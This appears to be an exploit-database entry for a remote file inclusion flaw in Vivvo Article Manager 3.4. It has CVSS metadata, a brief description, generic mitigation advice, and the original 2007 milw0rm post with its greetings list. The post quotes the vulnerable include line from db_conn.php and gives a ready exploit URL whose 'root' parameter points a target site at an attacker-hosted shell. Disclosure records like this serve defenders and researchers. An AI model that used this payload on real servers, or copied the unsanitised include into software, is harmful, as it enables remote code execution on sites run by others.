Vivvo Article Manager v 3.4 Remote Code Execution

vendor:

Vivvo Article Manager

by:

Snip0r

7.5

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Vivvo Article Manager

Affected Version From: Vivvo Article Manager v 3.4

Affected Version To: Vivvo Article Manager v 3.4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Vivvo Article Manager v 3.4 Remote Code Execution

The Vivvo Article Manager v 3.4 is vulnerable to remote code execution. By exploiting the './include/db_conn.php' script, an attacker can execute arbitrary code on the server. The vulnerability can be exploited by appending a specially crafted URL parameter 'root' with a shell URL.

Mitigation:

Update to a patched version of Vivvo Article Manager. Apply necessary security measures like input validation and sanitization to prevent remote code execution.

Source

Exploit-DB raw data:

===================================================================================================
Author: Snip0r
Script Name: Vivvo Article Manager v 3.4
Website: www.vivvo.net
===================================================================================================
Codesnippet of vulnerable script ("./include/db_conn.php"):

if (file_exists($ext_base_conf_file)) include_once($ext_base_conf_file);
===================================================================================================
Exploit:

http://victim.com/ [Vivvo Article Manager Path] / include / db_conn.php?root=[SHELL_URL]?
===================================================================================================
Greets fly out to: D-T-O, Blutkehle666,Chris,Doc,Legija0ne,Higgy,Anthra><,Basti and bi0
=================================================================================================== 

# milw0rm.com [2007-02-16]